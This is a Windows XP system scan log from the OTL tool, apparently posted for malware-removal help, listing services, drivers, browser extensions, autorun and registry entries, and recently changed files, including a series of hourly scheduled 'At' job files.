    SRV - [2010/11/29 17:42:16 | 000,363,344 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
    SRV - [2010/10/28 21:13:30 | 000,293,456 | ---- | M] (Logitech, Inc.) [On_Demand | Stopped] -- C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe -- (LBTServ)
    SRV - [2010/10/16 00:40:40 | 000,037,664 | ---- | M] (Apple Inc.) [Auto | Running] -- C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe -- (Apple Mobile Device)
    SRV - [2010/09/12 12:14:21 | 000,655,624 | ---- | M] (Acresso Software Inc.) [On_Demand | Stopped] -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
    SRV - [2010/05/20 18:19:16 | 000,088,176 | ---- | M] (McAfee, Inc.) [Auto | Running] -- c:\Program Files\McAfee\SiteAdvisor\McSACore.exe -- (McAfee SiteAdvisor Service)
    SRV - [2010/03/18 17:47:22 | 000,035,160 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe -- (aspnet_state)
    SRV - [2010/03/18 14:16:28 | 000,753,504 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe -- (WPFFontCache_v0400)
    SRV - [2010/03/18 14:16:28 | 000,130,384 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
    SRV - [2010/03/18 14:16:28 | 000,124,240 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe -- (NetTcpPortSharing)


    ========== Driver Services (SafeList) ==========

    DRV - [2010/11/30 17:06:04 | 006,261,352 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\RtkHDAud.sys -- (IntcAzAudAddService) Service for Realtek HD Audio (WDM)
    DRV - [2010/11/29 17:42:06 | 000,020,952 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\WINDOWS\system32\drivers\mbam.sys -- (MBAMProtector)
    DRV - [2010/10/17 05:55:00 | 009,623,680 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\nv4_mini.sys -- (nv)
    DRV - [2010/09/08 07:08:58 | 000,100,712 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\nvhda32.sys -- (NVHDA)
    DRV - [2010/08/25 04:31:18 | 000,028,624 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LUsbFilt.sys -- (LUsbFilt)
    DRV - [2010/08/25 04:31:02 | 000,037,328 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LMouFilt.Sys -- (LMouFilt)
    DRV - [2010/08/25 04:30:52 | 000,038,864 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LHidFilt.Sys -- (LHidFilt)
    DRV - [2010/08/25 04:30:18 | 000,010,448 | ---- | M] (Logitech, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\LBeepKE.sys -- (LBeepKE)
    DRV - [2010/07/25 11:51:42 | 000,691,696 | ---- | M] (Duplex Secure Ltd.) [Kernel | Boot | Stopped] -- C:\WINDOWS\System32\Drivers\sptd.sys -- (sptd)
    DRV - [2010/07/14 15:58:07 | 000,016,512 | ---- | M] (Windows (R) 2000 DDK provider) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\gdrv.sys -- (gdrv)
    DRV - [2009/11/18 07:17:00 | 001,395,800 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Monfilt.sys -- (Monfilt)
    DRV - [2009/11/18 07:16:00 | 001,691,480 | ---- | M] (Creative) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Ambfilt.sys -- (Ambfilt)
    DRV - [2009/06/18 03:56:24 | 000,079,248 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\LMouKE.Sys -- (LMouKE)
    DRV - [2009/06/18 03:55:26 | 000,063,248 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042mou.Sys -- (L8042mou)
    DRV - [2009/06/18 03:55:18 | 000,020,240 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042Kbd.sys -- (L8042Kbd)
    DRV - [2008/04/14 23:00:00 | 000,144,384 | ---- | M] (Windows (R) Server 2003 DDK provider) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\hdaudbus.sys -- (HDAudBus)
    DRV - [2008/01/15 22:50:52 | 000,459,520 | ---- | M] (Ralink Technology, Corp.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Dr71WU.sys -- (RT73)
    DRV - [2007/09/20 19:07:40 | 000,022,016 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\nvnetbus.sys -- (nvnetbus)
    DRV - [2007/09/20 19:07:38 | 000,053,632 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\NVENETFD.sys -- (NVENETFD)
    DRV - [2004/08/03 23:07:56 | 000,059,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\usbaudio.sys -- (usbaudio) USB Audio Driver (WDM)


    ========== Standard Registry (SafeList) ==========


    ========== Internet Explorer ==========

    IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm

    IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
    IE - HKCU\..\URLSearchHook: {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
    IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
    IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

    ========== FireFox ==========

    FF - prefs.js..browser.search.useDBForOrder: true
    FF - prefs.js..browser.startup.homepage: "http://www.houstontexans.com/news/calendar.html "
    FF - prefs.js..extensions.enabledItems: jqs@sun.com:1.0
    FF - prefs.js..extensions.enabledItems: {B7082FAA-CB62-4872-9106-E42DD88EDE45}:3.2
    FF - prefs.js..extensions.enabledItems: {DDC359D1-844A-42a7-9AA1-88A850A938A8}:1.1.10
    FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}:6.0.21
    FF - prefs.js..extensions.enabledItems: {bee6eb20-01e0-ebd1-da83-080329fb9a3a}:0.1
    FF - prefs.js..extensions.enabledItems: {AE93811A-5C9A-4d34-8462-F7B864FC4696}:3.76
    FF - prefs.js..extensions.enabledItems: {340c2bbc-ce74-4362-90b5-7c26312808ef}:1.5.1
    FF - prefs.js..extensions.enabledItems: {B17C1C5A-04B1-11DB-9804-B622A1EF5492}:1.2.1
    FF - prefs.js..extensions.enabledItems: {AB2CE124-6272-4b12-94A9-7303C7397BD1}:5.0.0.6778


    FF - HKLM\software\mozilla\Firefox\extensions\\{B7082FAA-CB62-4872-9106-E42DD88EDE45}: C:\Program Files\McAfee\SiteAdvisor [2010/12/02 14:54:38 | 000,000,000 | ---D | M]
    FF - HKLM\software\mozilla\Mozilla Firefox 3.6.12\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2010/10/29 15:57:41 | 000,000,000 | ---D | M]
    FF - HKLM\software\mozilla\Mozilla Firefox 3.6.12\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2010/11/20 23:46:27 | 000,000,000 | ---D | M]

    [2010/07/14 18:18:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Extensions
    [2010/11/29 16:16:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions
    [2010/07/31 20:20:41 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
    [2010/11/10 18:29:58 | 000,000,000 | ---D | M] (Firefox Sync) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{340c2bbc-ce74-4362-90b5-7c26312808ef}
    [2010/11/08 16:54:07 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}
    [2010/10/21 22:51:25 | 000,000,000 | ---D | M] (Password Exporter) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{B17C1C5A-04B1-11DB-9804-B622A1EF5492}
    [2010/08/16 18:58:26 | 000,000,000 | ---D | M] (Flash and Video Download) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{bee6eb20-01e0-ebd1-da83-080329fb9a3a}
    [2010/07/14 19:18:19 | 000,000,000 | ---D | M] (DownThemAll!) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}
    [2010/08/21 14:31:06 | 000,005,475 | ---- | M] () -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\searchplugins\googlecom-in-english.xml
    [2010/11/29 16:16:06 | 000,000,000 | ---D | M] -- C:\Program Files\Mozilla Firefox\extensions
    [2010/11/09 16:01:15 | 000,000,000 | ---D | M] (Skype extension) -- C:\Program Files\Mozilla Firefox\extensions\{AB2CE124-6272-4b12-94A9-7303C7397BD1}
    [2010/07/30 19:49:16 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}
    [2010/07/17 06:00:04 | 000,423,656 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npdeployJava1.dll
    [2007/03/10 10:16:44 | 000,189,496 | ---- | M] (Yahoo! Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npyaxmpb.dll
    [2009/12/24 14:15:24 | 000,000,614 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\image.xml

    O1 HOSTS File: ([2010/08/18 22:34:06 | 000,000,764 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
    O1 - Hosts: 127.0.0.1 localhost
    O1 - Hosts: 127.0.0.1 activate.adobe.com
    O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found.
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
    O2 - BHO: (Skype Plug-In) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
    O2 - BHO: (McAfee SiteAdvisor BHO) - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
    O3 - HKLM\..\Toolbar: (McAfee SiteAdvisor Toolbar) - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
    O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {472734EA-242A-422B-ADF8-83D1E48CC825} - No CLSID value found.
    O4 - HKLM..\Run: [AdobeCS4ServiceManager] C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe (Adobe Systems Incorporated)
    O4 - HKLM..\Run: [EvtMgr6] C:\Program Files\Logitech\SetPointP\SetPoint.exe (Logitech, Inc.)
    O4 - HKLM..\Run: [LifeChat] C:\Program Files\Microsoft LifeChat\LifeChat.exe (Microsoft Corporation)
    O4 - HKLM..\Run: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe (Malwarebytes Corporation)
    O4 - HKLM..\Run: [NvCplDaemon] C:\WINDOWS\System32\NvCpl.DLL (NVIDIA Corporation)
    O4 - HKLM..\Run: [NvMediaCenter] C:\WINDOWS\System32\NvMcTray.DLL (NVIDIA Corporation)
    O4 - HKLM..\Run: [nwiz] C:\Program Files\NVIDIA Corporation\nView\nwiz.exe ()
    O4 - HKLM..\Run: [WindowsLivePhone] C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe (Microsoft Corporation)
    O4 - HKCU..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe (Nero AG)
    O4 - HKCU..\Run: [RocketDock] C:\Program Files\RocketDock\RocketDock.exe ()
    O4 - HKCU..\Run: [WindowsLivePhone] C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe (Microsoft Corporation)
    O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Infodelivery present
    O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
    O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 255
    O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoAutorun = 1
    O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
    O9 - Extra Button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
    O9 - Extra 'Tools' menuitem : Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
    O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
    O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} C:\Program Files\Yahoo!\Common\Yinsthelper.dll (Reg Error: Key error.)
    O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
    O16 - DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
    O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
    O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)
    O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 211.31.138.11 211.29.132.12 198.142.0.51
    O18 - Protocol\Handler\dssrequest {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
    O18 - Protocol\Handler\sacore {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
    O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
    O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
    O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
    O20 - Winlogon\Notify\LBTWlgn: DllName - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll - c:\Program Files\Common Files\Logishrd\Bluetooth\LBTWLgn.dll (Logitech, Inc.)
    O24 - Desktop WallPaper: C:\Documents and Settings\Marshall\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
    O24 - Desktop BackupWallPaper: C:\Documents and Settings\Marshall\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
    O32 - HKLM CDRom: AutoRun - 1
    O32 - AutoRun File - [2010/07/14 12:18:14 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
    O32 - AutoRun File - [2009/04/29 20:02:01 | 000,000,055 | R--- | M] () - E:\autorun.inf -- [ CDFS ]
    O33 - MountPoints2\{45c44cdc-d34a-11df-a483-001fd0d8baba}\Shell\AutoRun\command - " " = C:\WINDOWS\System32\rundll.exe -- File not found
    O33 - MountPoints2\{45c44cdc-d34a-11df-a483-001fd0d8baba}\Shell\explore\command - " " = C:\WINDOWS\System32\rundll.exe -- File not found
    O33 - MountPoints2\{45c44cdc-d34a-11df-a483-001fd0d8baba}\Shell\open\command - " " = C:\WINDOWS\System32\rundll.exe -- File not found
    O33 - MountPoints2\{7de735f2-e597-11df-a4b0-001fd0d8baba}\Shell - " " = AutoRun
    O33 - MountPoints2\{7de735f2-e597-11df-a4b0-001fd0d8baba}\Shell\Auto\command - " " = G:\Automatic.sos -- File not found
    O33 - MountPoints2\{7de735f2-e597-11df-a4b0-001fd0d8baba}\Shell\AutoRun - " " = Auto&Play
    O33 - MountPoints2\{c0c47043-8f27-11df-a589-806d6172696f}\Shell - " " = AutoRun
    O33 - MountPoints2\{c0c47043-8f27-11df-a589-806d6172696f}\Shell\AutoRun - " " = Auto&Play
    O33 - MountPoints2\{c0c47043-8f27-11df-a589-806d6172696f}\Shell\AutoRun\command - " " = E:\BlueBirds.exe -- [2009/04/29 20:02:01 | 000,270,336 | R--- | M] (LG Electronics)
    O34 - HKLM BootExecute: (autocheck autochk *) - File not found
    O35 - HKLM\..comfile [open] -- "%1" %*
    O35 - HKLM\..exefile [open] -- "%1" %*
    O37 - HKLM\...com [@ = comfile] -- "%1" %*
    O37 - HKLM\...exe [@ = exefile] -- "%1" %*

    NetSvcs: 6to4 - File not found
    NetSvcs: Ias - File not found
    NetSvcs: Iprip - File not found
    NetSvcs: Irmon - File not found
    NetSvcs: NWCWorkstation - File not found
    NetSvcs: Nwsapagent - File not found
    NetSvcs: WmdmPmSp - File not found

    CREATERESTOREPOINT
    Restore point Set: OTL Restore Point (16620634377289728)

    ========== Files/Folders - Created Within 30 Days ==========

    [2010/12/06 09:45:07 | 000,000,000 | ---D | C] -- C:\Program Files\ESET
    [2010/12/06 07:12:48 | 000,000,000 | ---D | C] -- C:\WINDOWS\LastGood
    [2010/12/05 13:52:33 | 000,000,000 | ---D | C] -- C:\Program Files\MSXML 6.0
    [2010/12/05 11:44:28 | 000,000,000 | ---D | C] -- C:\WINDOWS\ServicePackFiles
    [2010/12/05 10:45:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files
    [2010/12/05 10:44:36 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\CatRoot_bak
    [2010/12/04 20:27:05 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Marshall\Recent
    [2010/12/04 19:54:09 | 000,000,000 | ---D | C] -- C:\FIX THIS PC
    [2010/12/04 19:49:45 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\My Documents\HELPZ
    [2010/12/04 19:23:35 | 000,000,000 | ---D | C] -- C:\Program Files\Temp File Cleaner
    [2010/12/04 18:58:36 | 000,000,000 | ---D | C] -- C:\Program Files\HiJackThis
    [2010/12/04 17:26:42 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\MFAData
    [2010/12/04 17:18:56 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\PC Tools
    [2010/12/04 17:01:15 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\My Documents\REG Backups
    [2010/12/04 16:50:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Local Settings\Application Data\Adobe
    [2010/12/04 16:50:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Application Data\Adobe
    [2010/12/04 16:31:42 | 000,000,000 | ---D | C] -- C:\Riot Games
    [2010/12/04 16:31:29 | 000,000,000 | ---D | C] -- C:\Program Files\Riot Games
    [2010/12/04 16:04:25 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Local Settings\Application Data\PMB Files
    [2010/12/04 16:04:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\PMB Files
    [2010/12/04 16:03:17 | 000,000,000 | ---D | C] -- C:\Program Files\Pando Networks
    [2010/12/04 15:31:15 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft LifeChat
    [2010/12/04 15:11:58 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Desktop
    [2010/12/04 15:11:53 | 000,000,000 | ---D | C] -- C:\Program Files\IObit
    [2010/12/04 14:57:23 | 000,000,000 | ---D | C] -- C:\Program Files\iPod
    [2010/12/04 14:57:18 | 000,000,000 | ---D | C] -- C:\Program Files\iTunes
    [2010/12/04 14:56:45 | 000,000,000 | ---D | C] -- C:\Program Files\Bonjour
    [2010/12/04 14:35:16 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Local Settings\Application Data\Logishrd
    [2010/12/04 14:34:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\LogiShrd
    [2010/12/04 14:34:25 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Logishrd
    [2010/12/04 14:34:24 | 000,000,000 | ---D | C] -- C:\Program Files\Logitech
    [2010/12/04 14:30:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Application Data\Logishrd
    [2010/12/04 14:05:16 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Application Data\Macromedia
    [2010/12/04 14:04:18 | 000,000,000 | ---D | C] -- C:\f187b0792ef2605282a8
    [2010/12/04 13:58:54 | 000,000,000 | ---D | C] -- C:\MISC Stuff
    [2010/12/01 14:42:24 | 000,000,000 | ---D | C] -- C:\WINDOWS\Prefetch
    [2010/12/01 14:37:43 | 000,079,872 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rwia330.dll
    [2010/12/01 14:37:43 | 000,079,872 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rwia001.dll
    [2010/12/01 14:37:43 | 000,026,624 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rw330ext.dll
    [2010/12/01 14:36:43 | 000,054,528 | ---- | C] (Philips Semiconductors GmbH) -- C:\WINDOWS\System32\dllcache\cap7146.sys
    [2010/11/27 13:10:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Application Data\TuneUp Software
    [2010/11/27 13:09:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\TuneUp Software
    [2010/11/27 13:07:11 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\All Users\Application Data\{24036256-BFDB-4CD3-BE8A-A3D6160F2E16}
    [2010/11/23 07:37:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\LocalService\Local Settings\Application Data\Apple
    [2010/11/14 14:38:22 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{0151C9FC-719D-4459-B1E2-4685CC6E62A8}
    [2010/11/12 18:44:53 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Marshall\Application Data\SecuROM
    [2010/11/12 18:15:11 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Marshall\Local Settings\Application Data\{0691F710-1ECA-4B5A-9727-25554F1BFDC6}
    [2010/11/12 17:29:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Local Settings\Application Data\Downloaded Installations
    [2010/11/12 16:41:33 | 000,000,000 | ---D | C] -- C:\Program Files\Electronic Arts
    [2010/11/09 16:03:28 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Local Settings\Application Data\Threat Expert
    [2010/11/09 16:02:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Application Data\skypePM
    [2010/11/09 16:00:21 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Skype
    [2010/11/09 16:00:20 | 000,000,000 | R--D | C] -- C:\Program Files\Skype
    [2010/11/09 16:00:19 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Application Data\Skype
    [2010/11/09 16:00:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Skype
    [9 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
    [3 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]

    ========== Files - Modified Within 30 Days ==========

    [2010/12/06 12:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At6.job
    [2010/12/06 11:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At2.job
    [2010/12/06 10:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At10.job
    [2010/12/06 09:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At12.job
    [2010/12/06 08:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At19.job
    [2010/12/06 07:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At24.job
    [2010/12/06 06:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At15.job
    [2010/12/06 05:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At21.job
    [2010/12/06 04:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At1.job
    [2010/12/06 03:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At9.job
    [2010/12/06 02:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At7.job
    [2010/12/06 01:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At18.job
    [2010/12/06 00:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At17.job
    [2010/12/05 23:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At20.job
    [2010/12/05 22:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At14.job
    [2010/12/05 21:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At16.job
    [2010/12/05 20:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At22.job
    [2010/12/05 19:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At4.job
    [2010/12/05 18:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At8.job
    [2010/12/05 17:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At3.job
    [2010/12/05 16:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At13.job
    [2010/12/05 15:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At23.job
    [2010/12/05 14:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At11.job
    [2010/12/05 14:50:31 | 000,495,848 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
    [2010/12/05 14:50:31 | 000,084,310 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
    [2010/12/05 14:46:24 | 000,013,646 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
    [2010/12/05 14:46:14 | 000,000,284 | ---- | M] () -- C:\WINDOWS\tasks\RealUpgradeLogonTaskS-1-5-21-1202660629-1500820517-682003330-1003.job
    [2010/12/05 14:46:14 | 000,000,236 | ---- | M] () -- C:\WINDOWS\tasks\OGALogon.job
    [2010/12/05 14:46:08 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
    [2010/12/05 13:58:50 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At5.job
    [2010/12/05 13:56:05 | 002,160,272 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
    [2010/12/05 13:53:46 | 000,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
    [2010/12/04 17:21:36 | 000,497,050 | ---- | M] () -- C:\WINDOWS\System32\drivers\Cat.DB
    [2010/12/04 15:37:06 | 000,240,592 | ---- | M] () -- C:\WINDOWS\System32\nvdrsdb1.bin
    [2010/12/04 15:37:06 | 000,000,001 | ---- | M] () -- C:\WINDOWS\System32\nvdrssel.bin
    [2010/12/04 15:37:02 | 000,240,592 | ---- | M] () -- C:\WINDOWS\System32\nvdrsdb0.bin
